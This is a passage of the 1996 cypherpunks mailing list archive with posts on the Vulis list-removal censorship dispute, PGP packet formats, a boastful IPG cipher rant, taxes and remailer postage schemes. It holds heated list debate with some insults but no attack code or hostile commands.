as stated in the postings is firmly this:  It's a warning about the real
possibility of such a system, given secure crypto technology and a more-
or-less anarchic net to host it.  As far as someone recommending it and
pushing for its acceptance, don't be so naive. The bad guys will have it
fully operational (if it is possible) *long* before you or your fellow
citizens have a crack at it, if ever.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Wed, 13 Nov 1996 21:31:52 -0800 (PST)
To: hyperlex@hol.gr>
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
In-Reply-To: <199611140715.FAA01670@prometheus.hol.gr>
Message-ID: <Pine.LNX.3.95.961114002510.3366A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 14 Nov 1996, George A. Stathis wrote:

> Not at all easy, for a lot of people. Moreover, it's very time-consuming.
> It's only easy if you are prepared to put up with costs of time, money,
> and also... service providers (who don't always agree with you)...

If setting up a new mailing list is that important to people, it will get
done.  There's nothing preventing people from pooling together resources to
form a mailing list.

> In a lot of places in the world, starting mailing lists is almost
> impossible unless you can be _inside_ an Internet Provider Company
> (and use Unix or whatever they use, in their own machines).

Some ISP's provide this service for not much more than the cost of a standard
dial-up account.  It certainly is possible for people to form a mailing list.
Most people find whining a lot easier.

> Man you're nutts. There are very few and quite vast Media Companies
> in the world, and they're on the verge of becoming monopolies.
> 
> Even your American President is in reality a puppet of the Trilateral
> Commission, who effectively also control CNN, the Washington Post,
> and many many many other things all over the world.
> 
> And you are saying that control of the media by ownership is
> impossible?  You're far out maaan! :-)
> 
> Only in America such a naive opinion could actually be _believed_.
> (here I go again... aga! :-) )

Is this a troll?

> 
> George
> 
> 
> P.S. Even if you offered me a million dollars I'd stay away from
>      your country. My sanity is much more valuable.  :-)
>      (The Immigration Authorities in the U.S. have missed the point:
>       We DON'T want to come to you guys. It's the last thing we'd want!)
> 

finger -l for PGP key
PGP encrypted mail prefered.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMoqvKSzIPc7jvyFpAQGtEggAuWVziHlb0UrImEJH1iZE5v5kv0z2gpgf
+Xmndm3x06B7bl2DkV/Fm4/djjqMoFXgz9gUXqL8KHR7CAQtR+ASO1lJBRG952OY
UJel2GlBstZjgDplOoktaLSJowsl2/1tukIzqBETSQ8Xq/0A5EZKnxgb9ktHot5v
mA35NzQuRvJtZ9CSTmolZVByJ1+nya8KV/RUOgRNDSQDQi1eX/X24K6hZvsljgZh
Db+aUH7+E6D2qagvzV1FIHJIcHq1XYvf8P8ABdu4PZPwvRtoL8gnh9Jyo2H4IWzI
fKUOJzbHcPKD/TFVjZs6VRjWPfudStNKLKjmRFhT+jdy2j5J53rc9Q==
=YYsl
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Charles Graves <llurch@networking.stanford.edu>
Date: Thu, 14 Nov 1996 01:16:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
Message-ID: <199611140916.BAA24474@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


hyperlex@hol.gr ("George A. Stathis") wrote:
>
>>> Mr. Gilmore, and other like minded parties, might want to consider
>>> what would happen if one parent company owned *all* communications
>>> media. Would they they be so supportive of the ideology of ownership
>>> and communciation they espouse?
>>
>>And just how plausible do you think this is?  I believe it is next to
>>impossible, unless it is the result of government regulation.
>
>Man you're nutts. There are very few and quite vast Media Companies
>in the world, and they're on the verge of becoming monopolies.
>
>Even your American President is in reality a puppet of the Trilateral
>Commission, who effectively also control CNN, the Washington Post,
>and many many many other things all over the world.

You're so naive. The Trilateral Commission is just a puppet of General
Electric, the British Royal Family, the Illuminati, the Council on Foreign
Relations, the Elders of Zion, the Knights Templar, the Military-
Industrial Complex, the Communists, the Secret Government, Dead White
Males, the Freemasons, the CIA, Scientology, and my Aunt Marge.

-rich
 special agent, zog northwest
 i do not speak for the world affairs council




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: assar@pdc.kth.se
Date: Wed, 13 Nov 1996 16:22:56 -0800 (PST)
To: Gary Howland <gary@systemics.com>
Subject: Re: pgp3
In-Reply-To: <199611131217.NAA19213@internal-mail.systemics.com>
Message-ID: <5lohh1bk5b.fsf@assaris.sics.se>
MIME-Version: 1.0
Content-Type: text/plain


Gary Howland <gary@systemics.com> writes:
> > > 1991  I   D. Atkins, W. Stallings, P. Zimmermann, "PGP Message Exchange
> > >            Formats", 08/16/1996. (Pages=21) (Format=.txt)
> 
> Hmm - I don't know I managed to make this post - I had started writing
> a reply, but exited my mailer, and for some reason it decided to send a
> cut down version of the unfinished mail anyway ...
> 
> > Nope. This RFC is merely a rehash of the pgformat.doc file in the PGP
> > 2.6.? distribution. I'm doing an independent implementation of the PGP

There are some parts of pgformat.doc that are not included in RFC1991,
especially the packets on the key ring.

> > 2.6 message formats, and found this document unclear in a few spots. For
> > example, can anyone else figure out the weird CFB variant mode from this
> > document? I used a debugger on the PGP code to help me figure it out.

That took quite some time for me to figure out...

> Exactly - I spent ages on the same thing.  Then there's the problem that
> packet length headers must be specific lengths for various types (eg.
> key certificates must have a 2 byte length, even if only one is required).

As far as I remember:
CTB_PUBLIC_KEY_CERTIFICATE and CTB_SIGNATURE are always 2 bytes
CTB_KEYRING_TRUST and CTB_USER_ID are always 1 byte

> information available?  I think we need a forum to discuss PGP development
> issues - I would be happy to set one up if there was interest.

Sounds like a good idea

/assar




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wichita@cyberstation.net
Date: Thu, 14 Nov 1996 01:48:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Q.E.D |= Montgolfiering + Inbongis + Fermented Pear Juice
Message-ID: <Pine.BSI.3.95.961114030250.472F-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain



         Fermented Pear Juice == Supercilious Pap

         There they go again, the imperium, or so they think, of
         cryptographic shamans are trying to bamboozle list readers
         into believing their warped cryptographic gimcrackery. They
         do not need Zadoc to anoint themselves the Solomons of the
         cryptographic world. They think that they are perfectly
         capable of doing it to themselves. Have they ever
         cracked a single meaningful cryptographic system?  Have they ever
         implemented a significant cryptographic system?

         Of course, I am not speaking of Dr. Ron Rivest and other
         rightfully honored members, but rather of that ragtag group
         of cryptographic medicine men that think they have all the
         answers to all the questions, that is, the small cypherlunks
         subset of cypherpunks/coderpunks.  Despite their trifling
         anomalous performances, they have Napoleonically crowned
         themselves as the aristocracy of cryptography.  They are not
         "au fait" august, aureate practitioners, rather "au fond",
         they are narcistic harlequins, "fons et origino" of their own
         and claque homologated mirages of autistic cryptographic
         fantasies.

         Remember, how that self appointed College of Cryptographic
         Cardinals cannonaded me, and you, with a fusillade of self
         serving avowals such as, "we do not do it for money, we do it
         for the public good", "it is our duty to expose snake oil
         salesmen", "I feel a snake oil attack coming on", "it is a
         public service", "we owe it to the public, to protect them
         against charlatans," and on and on "ad nauseam," with their
         silly putty rodomontades.  Now that their pusillanimity has
         been exposed for all to see clearly, they have apparently
         adopted the opportune, timorous motto of "sauve qui puet."

         They have proved themselves to be an alliance of fainaiguers
         that change their tunes when called to task. How many of them
         want to do it for the public good, now ? How many want to
         expose the snake oil salesman, now? How many of them want to
         protect the public, now? Not one. Show me, us,  one of them
         that is not intellectually tremulous. They leaped into the
         contest when they sensed blood, but now they realize that it
         is their blood to be spilled, they shirk from their
         intellectual responsibilities. All of the Sir Galihads and
         Sir Lancelots of yesterday, have proved themselves to be
         Sir Coward Chickens now, as everyone can plainly discern.
         Most of them have chosen the exeunt course and are now hiding
         their heads in the sand, hoping that no one will take note of
         them.

         Where are all those chivalrous cryptographic knights now? I
         am sure that if asked, most would reply to the effect that
         they are "otherwise engaged," which parses to "nonpossumus,"
         and only the most naive could fail to recognize that. What
         has become of their chivalry?  Quite simply, the impersonate
         knights have become loathly benighted.

         The cypherlunks, riffraff, were quick to engage in jousting
         over OTP logomachy because they thought that all they had to
         do was beat their fingers on the keyboard and cite Shannon.
         The neologizing of the term "Software OTP," drove them into
         an uncontrolled frenzy of attacks. Alas, to do so, did not
         tax their notional mental facilities.

         On the other hand, when challenged to demonstrate their
         cryptanalytical skills, the cypherlunks became panic stricken
         and in mass hysteria took flight in frightened awe of the IPG
         algorithm.  Their knightly bravado and braggadocio were
         hastily jettisoned in their wild flight away and superseded
         by their otiose nihility.

         That flock of cryptographic turkeys, a.k.a. cypherlunks,  flew 
         off to their clangorous roosts. There, though the more
         intelligent became quiescent as circumstances dictated, the
         court jesters started wildly flapping their wings and
         gobbling out their gobbledygook in order to becloud and
         confuse people about the proffer of the heretic.  Those
         clowns were, and are, trying to create the illusion that
         their incondite cryptographic skills are irrefutable because
         they say it is so, and that makes it so.

         I think that those cypherlunk fabulists should adopt the
         apropos motto, "Talk very loudly and carry a tiny turkey
         feather duster." Their quixotic sallies into cryptanalytics
         are quintessential asininities.  They are not subduing great
         crypto dragons, or giants, or even midgets, not even
         windmills; they, even more than Quixote, are merely
         fantasizing their efficaciousness.  Their only significant
         cryptographic artifices are locked forever within the
         confines of their convoluted individual and collective minds.

         The cypherlunk's nympholeptic calliope of reciprocal
         "inbongis" is indicative proof of their total capitulation in
         the face of the impregnable IPG algorithm.  Their clannish
         drum beating, high fiving, and back slapping of each other is
         reactionary declamatory histrionics. What a tragic waste.

         If there was only some way to channel and divert that energy
         atrophy into productive causes. For example, illimitable
         outrage against the dissonant alliance of Freeh and Saddam
         Hussein in trying to prevent their citizenry from having
         unbreakable encryption technologies. Gore and Rashanjanti are
         also advocating similar polices with respect to encryption  
         restrictions.

         We must recognize that Gore, Reno, Freeh, Exon, and others 
         similarly situated believe they are doing what is right. The
         fact though is, that by so doing they are becoming welcome allies
         of Hussein, Qadaffi, Rashanjanti, Castro and other
         human rights oppressors. That is a red flag if there was ever
         one. It raises the irreconcilable question of how can
         both groups in such an unseemly alliance be right.

         Obviously they cannot. Accordingly, that existential 
         incongruence succinctly points out the dichotomous character of
         the question of whether or not unbreakable encryption
         technologies should be made openly available to everyone.

         In reality, the question though is not even close.  While
         granted that there may be some criminals and terrorists who
         will pervert the use of encrypted communications, the number
         is extremely small because most such malefactors are far too
         ignorant and in too much of a hurry. If we spent a fraction of
         the saved money on openly bribing accomplices,  far better
         emanations would be forthcoming. Furthermore, even if
         unbreakable encryption systems were allowed, law
         enforcement would still have an immense arsenal, existing and
         developing,  of far more efficacious technological weapons
         available to them. 
         
         Cryptanalytics has become the tiny tail that continues to wag the
         immense dog of intelligence gathering. A few powerful oligarchs
         are screaming "the sky is falling, the sky is falling," in order
         to protect their "Hillistic" empires. Wake up, the sky is not
         falling, and it is not going to fall anytime soon. Oh, those
         all powerful empire builders think they are doing what is proper
         and prudent for our country and its people, but they are
         absolutely wrong.      

         The good far outweighs the bad on the balance scales. We
         desperately need unbreakable encryption technologies to aid and
         abet freedom fighters against tyranny around the world, and that
         is the reason that Hussein, Castro, Rashanjanti, and others of
         that persuasion are opposed to unbreakable encryption systems.
         We also need it in order to make it possible for individuals to 
         protect their privacy in the onrushing information age. We also
         need it to so that businesses can protect their proprietary and 
         other vital interests when essentially everything goes online.
         Unbreakable encryption will also insure for all people that
         governments do not wantonly intrude into their lives.

         To paraphrase FDR, "the only thing that we have to fear about
         unbreakable encryption systems, is the misplaced fear that it 
         will do more harm than good." If the Internet and the Information
         Age are to achieve their potential to build us a better world,
         then unbreakable encryption technologies must be one of the
         irreplaceable cornerstones on which such a future can be
         built.

         We, who favor the advancement of the view that I am advocating, 
         will not win by adhering to reactionary defensive tactics. We
         must go on the offensive. We need to bombard our Representatives
         and Senators with e-mail questioning why Castro, Freeh, Gore,
         Hussein, Qadaffi, Rashanjanti, Reno, Sung, Jr. and others that
         disagree about almost everything else are allies with respect to
         denying the public the use of unbreakable encryption technologies.
         Also, ask them,  how are we ever going to be able to
         address the privacy issues in the information age without
         such encryption systems.  Additionally, tell them about how we
         are handing over a multi-billion dollar market to foreign
         competitors because of the ITAR export ban, billions of  dollars
         a year now and growing. 

         We can win this affray because we are obviously in the right
         but we must become much more proactive by making everyone aware 
         of all of the good things that will accrue  to our human
         species by doing what we are advocating, That is the only real
         way to effectively combat those who mistakenly are taking the
         myopic view that we should not do it because it will 
         help the criminals and terrorists. Guns and explosives
         help maleficence elements too, but we do not outlaw them because
         they serve other very useful purposes, and the same thing is
         obviously true with with respect to unbreakable encryption
         technologies.

         Back to the IPG system, we believe that you would like to
         know that commencing this date, IPG is advertising as
         follows:

         "In addition to posting the algorithm(s) at our web site:

                       http://www.netprivacy.com

         IPG has also posted the algorithm(s) to a number of other
         sites, including Universities in the United States and
         Canada, as well as the famed Cypherpunks and Coderpunks
         lists. Since the IPG algorithm is impregnable, obviously no
         individual, or collection of individuals, from said
         Universities, the Cypherpunks, or the Coderpunks has been
         able to crack the system. Of course, this inability to do the
         impossible applies not only to the present but for all time,
         for all eternity."

         Of course what we are saying is obviously true, and we thought
         you might want to know.


Thanks so very much,

Don Wood



















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Wed, 13 Nov 1996 20:45:38 -0800 (PST)
To: Gary Howland <gary@systemics.com>
Subject: Re: Taxation Thought Experiment
In-Reply-To: <199611131240.NAA19255@internal-mail.systemics.com>
Message-ID: <Pine.LNX.3.94.961114044336.1589A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Nov 1996, Gary Howland wrote:

> > o TAXES THOUGHT EXPERIMENT
> > 
> >  1) I generate $100 of productivity for my company
> >  2) Company is taxed %30, $70 left
> >  3) Company pay shareholders and costs, $30 is left
> >  4) Company pays me
> >  5) I pay 40% in taxes, so $18 left
> >  6) With $18 I can buy a $16.82 object (%07 sales tax).
> > 
> > Results:
> >  1) I see $16.82 realization from $100 productivity increase.
> >  * Govt. gets $49.26 of my productivity, or nearly 3 times the amount I get.
> 
> The government gets $59.26, not $49.26 (30+16+12+1.26).
> That leaves you with 16.74 (not 16.82) - they get nearly four
> times as much.
> 

Actually, if you think about it, they get even more than that due to sales
tax and other such pains.  They _don't_ pay it, so when they have the
money, the money is worth more.

> Gary

 --Deviant
What does not destroy me, makes me stronger.
		-- Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George A. Stathis" <hyperlex@hol.gr>
Date: Wed, 13 Nov 1996 19:16:27 -0800 (PST)
To: dave@kachina.jetcafe.org>
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
Message-ID: <199611140715.FAA01670@prometheus.hol.gr>
MIME-Version: 1.0
Content-Type: text/plain


At 06:34 ìì 13/11/1996 -0500, Mark M. wrote:
(in response to):
>> Just as suddenly, the classic anti-free-speech arguments of "if you
>> don't like it, start yer own" begin to surface. (Anyone ever notice
>> how this resembles the "love it or leave it" mentality of certain
>> American patriotic organizations?)


>Governments maintain a monopoly on land, so the "love it or leave it" mentality
>is flawed.  Virtual space does not have the same limitations as physical
>space.  Starting your own mailing list is relatively easy.

Not at all easy, for a lot of people. Moreover, it's very time-consuming.
It's only easy if you are prepared to put up with costs of time, money,
and also... service providers (who don't always agree with you)...

In a lot of places in the world, starting mailing lists is almost
impossible unless you can be _inside_ an Internet Provider Company
(and use Unix or whatever they use, in their own machines).




>> It is sad to note that this is the leader of one of America's
>> forerunning organizations of freedom who says these words. For all
>> *his* ideology of free speech, this statement reveals the hypocrasy he
>> lives with for all to see. The true litmus test of free speech is to
>> encounter speech that you *want* to censor.
>
>The EFF protects against government censorship, not against "editorial
>control", "censorship", or whatever else you want to call it.  I don't
>see this as hypocritical at all.

Perhaps cynical, though? :-)




>> Mr. Gilmore, and other like minded parties, might want to consider
>> what would happen if one parent company owned *all* communications
>> media. Would they they be so supportive of the ideology of ownership
>> and communciation they espouse?
>
>And just how plausible do you think this is?  I believe it is next to
>impossible, unless it is the result of government regulation.



Man you're nutts. There are very few and quite vast Media Companies
in the world, and they're on the verge of becoming monopolies.

Even your American President is in reality a puppet of the Trilateral
Commission, who effectively also control CNN, the Washington Post,
and many many many other things all over the world.

And you are saying that control of the media by ownership is
impossible?  You're far out maaan! :-)

Only in America such a naive opinion could actually be _believed_.
(here I go again... aga! :-) )

George


P.S. Even if you offered me a million dollars I'd stay away from
     your country. My sanity is much more valuable.  :-)
     (The Immigration Authorities in the U.S. have missed the point:
      We DON'T want to come to you guys. It's the last thing we'd want!)











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 14 Nov 1996 07:00:38 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Censorship on cypherpunks?, from The Netly News
In-Reply-To: <328AA7B2.22EC@gte.net>
Message-ID: <Pine.GSO.3.95.961114065326.11045D-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain


The mere fact that a privately-owned discussion group becomes popular does
not mean that it becomes a public forum.

Say I start a poetry mailing list to discuss Blake's writings. I have
three people on it. One becomes obnoxious and emailbombs the list since he
disagrees with my interpretation of "A Memorable Fancy." Do I have the
right to kick him off? How is this different from a private poetry reading
in my home?

-Declan

"Prisons are built with stones of Law, brothels with bricks of
Religion." --WB





On Wed, 13 Nov 1996, Dale Thorn wrote:

> Declan McCullagh wrote:
> > The Netly News
> > http://www.netlynews.com/
> > November 11, 1996
> > Cypher-Censored
> > By Declan McCullagh (declan@well.com)
> >        The cypherpunks mailing list, so legend goes, coalesced around two
> >    principles: the dissemination of strong encryption and an absolute
> >    commitment to free speech. It was a kind of crypto-anarchist utopia:
> >    Here was a place where anonymity was encouraged and PGP-signed
> >    postings were the norm -- and nobody seemed to be in control.
> >        That is, until recently, when Dimitri Vulis was given the boot.
> >    After he refused to stop posting flames, rants and uninspired personal
> >    attacks, Vulis was summarily removed from the mailing list.
> 
> [snippo]
> 
> >        Vulis portrays himself as a victim, but as I posted to the list
> >    last week, I disagree. Anyone who's spent any time on the
> >    100-plus-messages-a-day list can read for themselves the kind of nasty
> >    daily messages that came from Vulis's keyboard. The list is on
> >    Gilmore's machine and he can do what he wants with it; he can moderate
> >    the postings, he can censor material, he can shut the whole thing down.
> 
> [mo' snippo]
> 
> So you disagree.  Well, the last sentence above says it all - this "list"
> that you and 1900+ other people spend so much time on is "just property"
> (like a slave), it's censorable (meaning freedom of speech is *specifically
> excluded*), and it's terminable without notice (meaning that it's really
> just one person's private fantasy, and we'll all bozos on the bus, as it were).
> 
> You and several other "personal friends/insiders" to John Gilmore must be
> laughing your butts off at the erstwhile schmoes like myself, who labor to
> reason with persons like yourself and "gods" like John Gilmore, who, after
> all, are obviously superior to us schmoes, since we sit and beg for our
> portions of email emanating from John "God" Gilmore's Holy Computer.
> 
> Why do you bother telling us that:
> 
>   "He can moderate the postings"
>   "He can censor material"
>   "He can shut the whole thing down"
> 
> Why?  Is this your way (or "God"'s way) of waving your dicks in our faces?
> 
> Well, I'll tell you what.  You can run your list (or kiss someone's butt
> who does), you can shut the thing down, and you can take a long walk off
> a short pier for all I or most anyone gives a damn, but let's call a spade
> a spade.  You're a suck-up, and Gilmore is a swaggering, overbearing, tin-
> plated dictator with delusions of Godhood.  Satisfied?
> 
> 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 14 Nov 1996 07:04:49 -0800 (PST)
To: Dave Hayes <dave@kachina.jetcafe.org>
Subject: Re: "Freedom Knights" are closet censors
In-Reply-To: <199611140652.WAA18702@kachina.jetcafe.org>
Message-ID: <Pine.GSO.3.95.961114070057.11045F-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain


What is "censoring other people's censorship?" Say I argue in favor of the
CDA. Would you censor me then? Why not? Isn't this censoring others
censorship?

I wonder why the so-called "Freedom Knights" are so insecure in their
beliefs that they will not tolerate a dissenting voice on their mailing 
list. (Let's forget for the moment that my point in subscribing was to
disrupt it. That's not the point, is it? "More speech, more speech!")

-Declan
Founder, Boycott Freedom Knights society, Washington, DC chapter


On Wed, 13 Nov 1996, Dave Hayes wrote:

> > The so-called "Freedom Knights" have censored me from their mailing list.
> > Dave Hayes refuses to let me subscribe and read and contribute to the
> > discussions there. Why? Simply because he doesn't like what I have to say.
> > I might criticize him. Truly, censorship says more about the censor than
> > the censored. 
> 
> Notice that I now have you arguing -my- side of the argument. Are you
> so easily controlled? Have you asked yourself why you are that way? 
> 
> > John Gilmore, on the other hand, has been much more tolerant. He allows
> > anyone to subscribe to cypherpunks and only kicked one person off after
> > months of ranting and off-topic drivel.
> 
> An ineffective move with symbolic complications that affect no one but
> him. Why do you support this? 
> 
> > And I wonder why the Freedom Knights want to censor certain newsgroups. As
> > in their FAQ, where they condemn speech they don't like on the alt.cancel
> > and alt.nocem newsgroups and advise operators not to carry such
> > groups. 
> 
> Ah, you finally got the newsgroups right. Good. 
> 
> I censor other people's censorship. That is what I do. Call me a
> censor if you will, but if you were truly in support of free speech
> you would understand. Since you don't, your cry of wolf demonstrates
> the depth of your consideration of the subject matter.
> 
> > I think it's time to lift the veil from this public Net-menace!
> 
> Knock ya-self out.
> 
> > Founder, Boycott Freedom Knights society, Washington, DC chapter
> 
> You -do- realize, of course, that you have to organize the people
> and create a large group of opposers to my cause.
> 
> That is your destiny. Carry it out.
> ------
> Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
> Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet
> 
> Nasrudin arrived at an all-comers horse race mounted on the slowest of oxen.
> Everyone laughed, an ox cannot run. 
> "But I have seen it, when it was only a calf, running faster than a horse.",
> said Nasrudin. "So why should it not run faster, now that it is larger?"
> 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 14 Nov 1996 04:29:28 -0800 (PST)
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: PGP3.0 & ElGamal
In-Reply-To: <v03007813aeb0506ae6a3@[206.119.69.46]>
Message-ID: <199611141225.HAA19903@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


Robert Hettinga wrote:
| At 10:43 pm -0500 11/13/96, Lucky Green wrote:
| >I agree. Support for soon to be patent free algrithms is a good thing. I
| >hope that in version 4.0, after the users had time to migrate to
| >DSS/ElGamal, PGP will fully move away from RSA.
| 
| Speaking of patent-free, :-), can you do blind signatures without RSA?

Chaum has something called unanticipated blind signatures that don't
use RSA.  The problem with blinding is not the RSA patents.  Those run
out much sooner than Chaum's patents.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Thu, 14 Nov 1996 07:43:55 -0800 (PST)
To: Paul George <cypherpunks@toad.com
Subject: Re: Computer Security Training
Message-ID: <199611141540.HAA05666@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:44 PM 11/13/96 -0500, Paul George wrote:

...
>I'd like to ask very poignant questions since this will be my second to
>the last day working for Uncle Sam. (I'm going Private Industry, yeeaa!!)
>
>And I really don't care what my boss thinks of my questions. ;)
>
>Paul.
>
>Oh, I unsubscribed to the list, 500 emails over a long weekend is too
>much.  So please CC: questions to george@justice.usdoj.gov and I will
>forward all answers to the list. Thanks a bunch....
...
First of all, do you need references?  Your boss would probably be the best
one, unless you destroy h[is,er] faith in you.
Second, when would they fire you anyway?  Two th three weeks later?  After
your grace period expired?  By then you should already be out of your
office.  Unless you need the course for your free enterprize work.
If not, you could impress your boss, (and possibly get a few extra
government contracts down the line), by volunteering to stay at your desk as
you won't need the material for your employment.
The above was made under the assumption that your branch occasionaly
"outsources" projects or calls on private consultants when it needs extra
hands (minds).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Thu, 14 Nov 1996 07:40:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
Message-ID: <199611141540.HAA05676@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:22 PM 11/13/96 GMT, Adam Back wrote:
...
>Nym sues nym.  I think not.  An alternate view of slander law suits is
>as a way to encourage the use of Nyms.  Certainly the dissenters of
>the unnamed pseudo religious have learnt the value of nyms, remailers
>and so forth.  There are distinct advantages to nyms.
...
They learned the value all right.  Right up to the time that one of the
founding remailers disclosed thier return addresses to save the rest of the
hard drive.  There are definate advantages to TRULY anonymous remailers too.
Ones where the return address is not stored.  For mailing lists and
newsgroups, where you are going to get conformation on your post when its
relayed to you, why do you need the return address anyway?  Someone inside
the group uses a remailer, just post your comments to the list, that person
will most likely see it there.  I assume that these already exist somewhere.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Thu, 14 Nov 1996 07:42:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: Remailer Abuse Solutions
Message-ID: <199611141540.HAA05682@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:32 PM 11/13/96 -0800, Lucky Green wrote:
>On Wed, 13 Nov 1996, Peter Hendrickson wrote:
>
>> At 10:34 AM 11/13/1996, Mullen Patrick wrote:
>> > Also,
>> > what happens when your long-lost friend comes across your addy and tries to
>> > email you?  Surely you don't want to charge postage for an otherwise free
>> > service to him/er.  Maintaining a list of "accepted sources" would be a
hassle
>> > not many people would accept.
>> 
>> Absent highly intrusive global net monitoring techniques, that's what they
>> are going to have to do anyway.  E-mail is inexpensive.  The advertiser
>> can justify the expense even if generates a small number of leads.  Expect
>> more spam.
>
>There is a very simple way of dealing with your long lost friend. And any 
>other person not on your "free" list. If you find their email worth your 
>while, you can always give them their money back. For future contact, you 
>can move your friend on the "free" list.
>
>Frankly, I don't think there is anybody new that I care to communicate with 
>who wouln't be willing to make a small deposit for initiating communications.
>
>-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
>   Member JPFO. "America's Aggressive Civil Rights Organization"
You might want to consider making that a price on message size, otherwise
I'll just send you the contents of the Sears catalog, the Damark catalog,
the full collection of the clearing house sweepstakes, and an Amway catalog
at one low price.  (My backers could get in on a great cut, at $1.00 a
message they would each pay $.25)
I would say $.50 per Kilobyte, including attachments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 14 Nov 1996 08:31:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [TEST] [IGNORE] [NOISE]
In-Reply-To: <961113202708_1418929826@emout02.mail.aol.com>
Message-ID: <BTVDXD9w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Bryondp@aol.com writes:

> take me off this fucking list

Isn't it ironic how dozens of people seem to have trouble unsubscribing
from this list, and instead of trying to make the listserver software
friendly, John "Hitler" Gilmore and his censor buddies are trying to invest
new ways to silence those they disagree with?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 14 Nov 1996 05:20:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <1.5.4.32.19961114131814.006c3730@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Declan,

Cypherpunks does not seem to me to be anything like the well-
regulated lists you ascribe to Prof Volokh.

Could you, with Professor Volokh, expand on the application of 
"editorial control" on "unmoderated" lists? (See Netly below)

As well as amplify "the power to kick folks off a list ... if 
conversation veers too far from the list's charter." (See 
your quote below) 

Isn't this power the black heart of free speech racketeering? 
And what makes the glands of secret authoritarians thrill with 
benevolent suppression of assent on behalf of the disorderly, 
fuzzy-minded citizenry?

Media moguls and list runners share commonalities, to be sure,
but I wonder if it's not cruel to compare John Gilmore to Professsor
Volokh, and both to, say, Rupert Murdoch.


--------

[Netly News]

Eugene Volokh, a law professor at UCLA, runs a number of mailing
lists and has kicked people off to maintain better editorial control.
Volokh says that the most valuable publications are those that
exercise the highest degree of editorial control.

[Your post of 11-13]

In my experience, and I've talked about this at some length with Prof. 
Volokh who runs a number of lists himself, the best and most valuable
discussion lists are those that are unmoderated but have a list owner who
has the power to kick folks off a list and can try to steer the direction
of a conversation if it veers too far from the list's charter.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Thu, 14 Nov 1996 05:31:37 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Censor John Gilmore -- EFF is a disgrace!
In-Reply-To: <Pine.GSO.3.95.961113122648.8294B-100000@well.com>
Message-ID: <Pine.LNX.3.95.961114080400.6941E-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Nov 1996, Declan McCullagh wrote:

> Date: Wed, 13 Nov 1996 13:12:50 -0800 (PST)
> From: Declan McCullagh <declan@well.com>
> Reply-To: freedom-knights@jetcafe.org
> To: Dave Hayes <dave@kachina.jetcafe.org>
> Cc: freedom-knights@jetcafe.org, cypherpunks@toad.com
> Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News 
> 
> I am amused. I gave Dave Hayes about an 8.5 out of 10 on the scale of
> meaningless political rants.
> 

Jealousy rears it's ugly head.  You just wish you had the credibility
that Dave Hayes has.

> I'll address some of his points.
> 

Do it within his text as you are supposed to.

> * "Political safety?" I stand by my record as a writer. Check out
